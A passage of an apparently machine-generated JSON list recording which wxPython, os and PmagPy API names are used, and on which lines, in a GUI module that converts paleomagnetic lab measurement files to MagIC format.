{"api_name": "wx.StaticBox", "line_number": 1138, "usage_type": "call"}, {"api_name": "wx.ID_ANY", "line_number": 1138, "usage_type": "attribute"}, {"api_name": "wx.HORIZONTAL", "line_number": 1138, "usage_type": "attribute"}, {"api_name": "wx.TextCtrl", "line_number": 1140, "usage_type": "call"}, {"api_name": "wx.StaticText", "line_number": 1141, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets.lab_field", "line_number": 1144, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1144, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 1148, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1148, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.select_ncn", "line_number": 1151, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1151, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 1155, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1155, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.replicate_measurements", "line_number": 1162, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1162, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.btn_panel", "line_number": 1166, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1166, "usage_type": "name"}, {"api_name": "wx.BoxSizer", "line_number": 1169, "usage_type": "call"}, {"api_name": "wx.VERTICAL", "line_number": 1169, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1171, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1171, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1172, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1172, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1173, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1173, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1174, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1174, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1175, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1175, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1176, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1176, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1177, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1177, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1178, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1178, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1179, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1179, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1180, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1180, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1181, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1181, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1183, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1183, "usage_type": "attribute"}, {"api_name": "wx.StaticLine", "line_number": 1184, "usage_type": "call"}, {"api_name": "wx.ALL", "line_number": 1184, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 1184, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_CENTER", "line_number": 1185, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 1188, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 1188, "usage_type": "attribute"}, {"api_name": "dialogs.pmag_widgets.on_add_file_button", "line_number": 1202, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1202, "usage_type": "name"}, {"api_name": "os.chdir", "line_number": 1208, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 1212, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1212, "usage_type": "name"}, {"api_name": "os.path.isfile", "line_number": 1216, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1216, "usage_type": "attribute"}, {"api_name": "os.path.split", "line_number": 1218, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1218, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 1219, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1219, "usage_type": "attribute"}, {"api_name": "os.path.split", "line_number": 1221, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1221, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 1222, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1222, "usage_type": "attribute"}, {"api_name": "os.path.split", "line_number": 1224, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1224, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 1225, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1225, "usage_type": "attribute"}, {"api_name": "os.path.split", "line_number": 1227, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1227, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 1228, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1228, "usage_type": "attribute"}, {"api_name": "os.path.split", "line_number": 1230, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1230, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 1231, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1231, "usage_type": "attribute"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 1240, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1240, "usage_type": "name"}, {"api_name": "pmagpy.convert_2_magic.huji", "line_number": 1277, "usage_type": "call"}, {"api_name": "pmagpy.convert_2_magic", "line_number": 1277, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.close_window", "line_number": 1279, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1279, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 1281, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1281, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.on_helpButton", "line_number": 1284, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1284, "usage_type": "name"}, {"api_name": "pmagpy.convert_2_magic.huji.__doc__", "line_number": 1284, "usage_type": "call"}, {"api_name": "pmagpy.convert_2_magic.huji", "line_number": 1284, "usage_type": "attribute"}, {"api_name": "pmagpy.convert_2_magic", "line_number": 1284, "usage_type": "name"}, {"api_name": "wx.BoxSizer", "line_number": 1294, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 1294, "usage_type": "attribute"}, {"api_name": "wx.StaticText", "line_number": 1295, "usage_type": "call"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1295, "usage_type": "attribute"}, {"api_name": "dialogs.pmag_widgets.choose_dir", "line_number": 1299, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1299, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.sampling_particulars", "line_number": 1302, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1302, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.select_ncn", "line_number": 1306, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1306, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 1310, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1310, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.select_specimen_ocn", "line_number": 1313, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1313, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 1317, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1317, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 1321, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1321, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.replicate_measurements", "line_number": 1324, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1324, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.site_lat_lon", "line_number": 1327, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1327, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.btn_panel", "line_number": 1330, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1330, "usage_type": "name"}, {"api_name": "wx.BoxSizer", "line_number": 1333, "usage_type": "call"}, {"api_name": "wx.VERTICAL", "line_number": 1333, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1335, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1335, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1336, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1336, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1337, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1337, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1338, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1338, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1339, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1339, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1340, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1340, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1341, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1341, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1342, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1342, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1343, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1343, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1344, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1344, "usage_type": "attribute"}, {"api_name": "wx.StaticLine", "line_number": 1345, "usage_type": "call"}, {"api_name": "wx.ALL", "line_number": 1345, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 1345, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_CENTER", "line_number": 1346, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 1349, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 1349, "usage_type": "attribute"}, {"api_name": "os.chdir", "line_number": 1364, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 1371, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1371, "usage_type": "name"}, {"api_name": "os.listdir", "line_number": 1373, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 1376, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1376, "usage_type": "name"}, {"api_name": "pmagpy.convert_2_magic._2g_bin", "line_number": 1430, "usage_type": "call"}, {"api_name": "pmagpy.convert_2_magic", "line_number": 1430, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.close_window", "line_number": 1431, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1431, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 1433, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1433, "usage_type": "name"}, {"api_name": "pmagpy.convert_2_magic._2g_bin", "line_number": 1437, "usage_type": "call"}, {"api_name": "pmagpy.convert_2_magic", "line_number": 1437, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 1440, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1440, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.on_helpButton", "line_number": 1444, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1444, "usage_type": "name"}, {"api_name": "pmagpy.convert_2_magic._2g_bin", "line_number": 1444, "usage_type": "attribute"}, {"api_name": "pmagpy.convert_2_magic", "line_number": 1444, "usage_type": "name"}, {"api_name": "wx.BoxSizer", "line_number": 1457, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 1457, "usage_type": "attribute"}, {"api_name": "wx.StaticText", "line_number": 1458, "usage_type": "call"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1458, "usage_type": "attribute"}, {"api_name": "dialogs.pmag_widgets.choose_dir", "line_number": 1462, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1462, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.sampling_particulars", "line_number": 1465, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1465, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.select_ncn", "line_number": 1469, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1469, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 1473, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1473, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.select_specimen_ocn", "line_number": 1476, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1476, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 1480, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1480, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 1484, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1484, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.replicate_measurements", "line_number": 1487, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1487, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.site_lat_lon", "line_number": 1490, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1490, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.btn_panel", "line_number": 1493, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1493, "usage_type": "name"}, {"api_name": "wx.BoxSizer", "line_number": 1496, "usage_type": "call"}, {"api_name": "wx.VERTICAL", "line_number": 1496, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1498, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1498, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1499, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1499, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1500, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1500, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1501, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1501, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1502, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1502, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1503, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1503, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1504, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1504, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1505, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1505, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1506, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1506, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1507, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1507, "usage_type": "attribute"}, {"api_name": "wx.StaticLine", "line_number": 1508, "usage_type": "call"}, {"api_name": "wx.ALL", "line_number": 1508, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 1508, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_CENTER", "line_number": 1509, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 1512, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 1512, "usage_type": "attribute"}, {"api_name": "os.chdir", "line_number": 1527, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 1534, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1534, "usage_type": "name"}, {"api_name": "os.listdir", "line_number": 1536, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 1539, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1539, "usage_type": "name"}, {"api_name": "pmagpy.convert_2_magic._2g_asc", "line_number": 1593, "usage_type": "call"}, {"api_name": "pmagpy.convert_2_magic", "line_number": 1593, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.close_window", "line_number": 1594, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1594, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 1596, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1596, "usage_type": "name"}, {"api_name": "pmagpy.convert_2_magic._2g_asc", "line_number": 1600, "usage_type": "call"}, {"api_name": "pmagpy.convert_2_magic", "line_number": 1600, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 1603, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1603, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.on_helpButton", "line_number": 1607, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1607, "usage_type": "name"}, {"api_name": "pmagpy.convert_2_magic._2g_bin", "line_number": 1607, "usage_type": "attribute"}, {"api_name": "pmagpy.convert_2_magic", "line_number": 1607, "usage_type": "name"}, {"api_name": "wx.BoxSizer", "line_number": 1620, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 1620, "usage_type": "attribute"}, {"api_name": "wx.StaticText", "line_number": 1621, "usage_type": "call"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1621, "usage_type": "attribute"}, {"api_name": "dialogs.pmag_widgets.choose_file", "line_number": 1624, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1624, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.experiment_type", "line_number": 1628, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1628, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.lab_field", "line_number": 1635, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1635, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.select_ncn", "line_number": 1638, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1638, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 1642, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1642, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 1646, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1646, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.replicate_measurements", "line_number": 1649, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1649, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 1653, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1653, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 1657, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1657, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.mass_or_volume_buttons", "line_number": 1660, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1660, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.btn_panel", "line_number": 1663, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1663, "usage_type": "name"}, {"api_name": "wx.BoxSizer", "line_number": 1666, "usage_type": "call"}, {"api_name": "wx.VERTICAL", "line_number": 1666, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 1667, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 1667, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1668, "usage_type": "attribute"}, {"api_name": "wx.RIGHT", "line_number": 1668, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 1669, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 1669, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1670, "usage_type": "attribute"}, {"api_name": "wx.RIGHT", "line_number": 1670, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1671, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1673, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1673, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1674, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1674, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1675, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1675, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1676, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1676, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1677, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1677, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1678, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1678, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1679, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1679, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1680, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1680, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1681, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1681, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1682, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1682, "usage_type": "attribute"}, {"api_name": "wx.StaticLine", "line_number": 1684, "usage_type": "call"}, {"api_name": "wx.ALL", "line_number": 1684, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 1684, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_CENTER", "line_number": 1685, "usage_type": "attribute"}, {"api_name": "wx.BOTTOM", "line_number": 1685, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 1687, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 1687, "usage_type": "attribute"}, {"api_name": "os.chdir", "line_number": 1699, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 1703, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1703, "usage_type": "name"}, {"api_name": "os.path.split", "line_number": 1706, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1706, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 1707, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1707, "usage_type": "attribute"}, {"api_name": "os.path.split", "line_number": 1709, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1709, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 1710, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1710, "usage_type": "attribute"}, {"api_name": "os.path.split", "line_number": 1712, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1712, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 1713, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1713, "usage_type": "attribute"}, {"api_name": "os.path.split", "line_number": 1715, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1715, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 1716, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1716, "usage_type": "attribute"}, {"api_name": "os.path.split", "line_number": 1718, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1718, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 1719, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1719, "usage_type": "attribute"}, {"api_name": "pmagpy.convert_2_magic.ldeo", "line_number": 1760, "usage_type": "call"}, {"api_name": "pmagpy.convert_2_magic", "line_number": 1760, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.close_window", "line_number": 1762, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1762, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 1764, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1764, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.on_helpButton", "line_number": 1767, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1767, "usage_type": "name"}, {"api_name": "pmagpy.convert_2_magic.ldeo", "line_number": 1767, "usage_type": "attribute"}, {"api_name": "pmagpy.convert_2_magic", "line_number": 1767, "usage_type": "name"}, {"api_name": "wx.BoxSizer", "line_number": 1779, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 1779, "usage_type": "attribute"}, {"api_name": "wx.StaticText", "line_number": 1780, "usage_type": "call"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1780, "usage_type": "attribute"}, {"api_name": "dialogs.pmag_widgets.radio_buttons", "line_number": 1784, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1784, "usage_type": "name"}, {"api_name": "wx.HORIZONTAL", "line_number": 1784, "usage_type": "attribute"}, {"api_name": "wx.EVT_RADIOBUTTON", "line_number": 1785, "usage_type": "attribute"}, {"api_name": "dialogs.pmag_widgets.simple_text", "line_number": 1793, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1793, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.choose_file", "line_number": 1796, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1796, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.site_lat_lon", "line_number": 1799, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1799, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.replicate_measurements", "line_number": 1802, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1802, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 1806, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1806, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 1809, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1809, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.choose_file", "line_number": 1812, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1812, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.btn_panel", "line_number": 1816, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1816, "usage_type": "name"}, {"api_name": "wx.BoxSizer", "line_number": 1819, "usage_type": "call"}, {"api_name": "wx.VERTICAL", "line_number": 1819, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1822, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1822, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1823, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1823, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1824, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1824, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1825, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1825, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1826, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1826, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1827, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1827, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1828, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1828, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1829, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1829, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 